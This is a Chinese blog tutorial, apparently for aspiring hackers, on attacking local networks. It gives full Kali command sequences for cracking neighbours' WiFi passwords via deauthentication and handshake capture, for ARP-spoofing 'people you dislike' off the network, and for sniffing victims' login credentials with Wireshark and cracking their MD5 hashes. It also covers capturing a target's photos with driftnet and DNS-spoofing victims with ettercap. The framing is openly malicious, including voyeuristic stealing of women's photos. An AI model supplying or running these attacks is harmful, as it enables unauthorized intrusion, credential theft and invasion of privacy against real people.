局域网安全,包括以下内容(其中用到的工具,可以百度,也可以给我留言)
1.局域网安全简介
2.利用kali破解wifi密码
3.让不顺眼的人断网
4.局域网密码嗅探
5.内网抓图获取妹子相册
局域网安全简介
1. 什么是局域网
同一个交换机(划分了vlan的同一AP不是局域网)、同一个hub或者同一个家用路由器。如果不在同一局域网,就得想办法,比如破解他的wifi密码。
2. 局域网主要有什么威胁
来自内网的攻击非常多,也很难解决:抓包嗅探、dns欺骗、泛洪攻击等。如果能拿到网关或者交换机的管理权限,那么攻击是很方便的。
3. 路由器配置
了解管理路由器账户密码、pppoe、ssid(bssid)、信道、mac、mac克隆。
TP-LINK步骤:
一:首先如果有个无线路由器,那么就先把电源接通,然后插上网线,进线插在wan口(一般是蓝色口),然后跟电脑连接的网线就随便插哪一个lan口啦,做好这些工作后,然后你会看到路由器后面有个地址跟帐号密码,连接好后在浏览器输入在路由器看到的地址,一般是192.168.1.1(当然如果你家是用电话线上网那就还要多准备一个调制调解器,俗称“猫”)
二:然后进入,输入相应的帐号跟密码,一般新买来的都是admin
三:确实后进入操作界面,你会在左边看到一个设置向导,进击进入(一般的都是自动弹出来的)
四:进入设置向导界面
五:点击下一步,进入上网方式设置,我们可以看到有三种上网方式的选择,如果你家是拨号的话那么就用PPPoE。动态IP一般电脑直接插上网络就可以用的,上层有DHCP服务器的。静态IP一般是专线什么的,也可能是小区带宽等,上层没有DHCP服务器的,或想要固定IP的。因为我拨号所以选择pppoe。
六:选择PPPOE拨号上网就要填上网帐号跟密码,这个应该大家都明白,开通宽带都会有帐号跟,填进去就OK啦
七:然后下一步后进入到的是无线设置,我们可以看到信道、模式、安全选项、SSID等等,一般SSID就是一个名字,你可以随便填,然后模式大多用11bgn.无线安全选项我们要选择wpa-psk/wpa2-psk,这样安全,免得轻意让人家破解而蹭网。
八:下一步就设置成功啦
九:点击完成,路由器会自动重启,这时候你耐心等待吧。成功后出现的界面。
4. 字典
kali自带字典解压:gzip -d /usr/share/wordlists/rockyou.txt.gz
利用kali破解wifi密码
1.支持监控模式的网卡
虚拟机是不支持驱动的,所以需要外接网卡(比如RT3070L)。装驱动得用U盘装kali,或者双系统,然后安装驱动。
将无线网卡链接到kali中
2. 操作步骤
①列出支持监控模式的网卡 airmon-ng
②开启网卡的监控模式 airmon-ng start wlan0 (成功后wlan0会变成wlan0mon)
③查看wifi网络 airodump-ng wlan0mon(查看附近出现的wifi,ctrl+c暂停搜索)
④抓取握手包 airodump-ng -c 12 –bssid 00:26:5A:F1:FF:2F -w ~/ wlan0mon(-c是CH,–bssid是BSSID,-w是保存,保存到根目录主文件夹)
⑤强制连接到wifi的设备重新连接路由器(方便监听抓取握手包)
新建端口:aireplay-ng -0 2 -a 00:26:5A:F1:FF:2F -c EC:0E:C4:16:4C:D5 wlan0mon(选择上面抓到的握手包,将连接的客户端断网)
⑥回到之前端口 按Ctrl+C结束抓包。结束无线网卡的监控模式: airmon-ng stop wlan0mon
⑦开始破解密码aircrack-ng -a2 -b 00:26:5A:F1:FF:2F -w /usr/share/wordlists/rockyou.txt ~/*.cap
让不顺眼的人断网
1. OSI网络模型底下三个
七层模型
物理层:
数据链路层:
网络层:
传输层:
会话层:
表示层:
应用层:
2. arp和rarp
arp ip -> mac
rarp mac -> ip
3. 断网操作
环境:win7和kali
扫描本网段联网主机 fping –asg 192.168.254.0/24
执行攻击arpspoof -i eth0 -t 192.168.254.140(受害者) 192.168.254.2(网关地址)
局域网密码嗅探
1.同一局域网嗅探原理
2.使用的工具
wireshark:自己去官网下载,自动安装插件
3.wireshark过滤规则
百度wireshark过滤规则
一:过滤源ip、目的ip。在wireshark的过滤规则框Filter中输入过滤条件。如查找目的地址为192.168.101.8的包,ip.dst==192.168.101.8;查找源地址为ip.src==1.1.1.1;
二:端口过滤。如过滤80端口,在Filter中输入,tcp.port==80,这条规则是把源端口和目的端口为80的都过滤出来。使用tcp.dstport==80只过滤目的端口为80的,tcp.srcport==80只过滤源端口为80的包;
三:协议过滤比较简单,直接在Filter框中直接输入协议名即可,如过滤HTTP的协议;
四:http模式过滤。如过滤get包,http.request.method==”GET”,过滤post包,http.request.method==”POST”;
五:连接符and的使用。过滤两种条件时,使用and连接,如过滤ip为192.168.101.8并且为http协议的,ip.src==192.168.101.8 and http。
4.抓取到的信息筛选
中文ID需要进行URL转码,加密密码需要解密
步骤:
打开wireshark,发现网卡,双击进入,开始嗅探,局域网抓包
如果同一局域网的电脑登陆某个系统,有用户名密码,可以被监听到
抓包结束,可以选择固定的IP进行查看:ip.addr=115.123.196.234(你想监听的那个人的IP)
找协议为HTTP,含有action=login的页面,双击进入,在URL Encoded中可以查看用户名密码,
如果用户名是乱码,可以进行转码,如果密码是乱码,一般为md5加密,可以找md5网站破解。
内网抓图获取妹子相册
kali
1.原理
类似于抓包,但是这个只是劫持一个人的
2.端口转发
临时开启ip转发命令echo 1 > /proc/sys/net/ipv4/ip_forward
开启ARP欺骗 arpspoof -i eth0 -t 192.168.254.140 192.168.254.2
3.嗅探
利用工具 driftnet(获取本机图片)
driftnet -i eth0
DNS欺骗
1.什么是dns,什么作用
域名和ip之间的关系的对应,就是由dns负责。(hosts)
2.dns欺骗有什么要求
要求对方dns是自动获取(关于dns故障,可以上q不能上网站)
dns(8.8.8.8,,114.114.114.114)
3.欺骗过程
ettercap的DNS文件进行编辑,在kali linux2.0下的文件路径为/etc/ettercap/etter.dns
标识和IP地址 * 代表所有域名 后边就是你要欺骗为的IP地址(例如:* A ip(www.zchaohome.com)或者 * PTR ip(www.zchaohome.com) )
输入命令ettercap -G来进入ettercap的图形界面
选择网卡Unfied sniffing配置自己的网卡,我的是eth0
扫描在线的主机,来到hosts选项下的 scan for hosts并列出Hosts list
网关进行添加到 Add to target 1 受害者添加到 Add to target 2
继续点击mitm>arp poisoning选中第一个选项并确定
配置插件plugins>mangge the plugins 选择 双击dns_spoof
最后点击strat>start sniffing开始DNS欺骗
目的:让受害者输入的网址指向你自己设置的网址
本文内容由技术讲师董文磊提供支持
更多精彩内容及细节学习:请到网易云课堂董文磊讲师专题学习
http://study.163.com/provider/1021000286/index.htm
Latest posts by zchao (see all)
- Auraでアクションボタン作成して画面のチェックボックス項目一括処理 - 2021年4月12日
- デフォルト項目値を含むレコード作成実例説明(defaultFieldValues) - 2021年1月9日
- Salesforce のノーコード・ローコード開発 - 2020年12月31日
转载请注明:zchao博客之家 » 黑客入门学习之局域网安全(破解wifi密码等)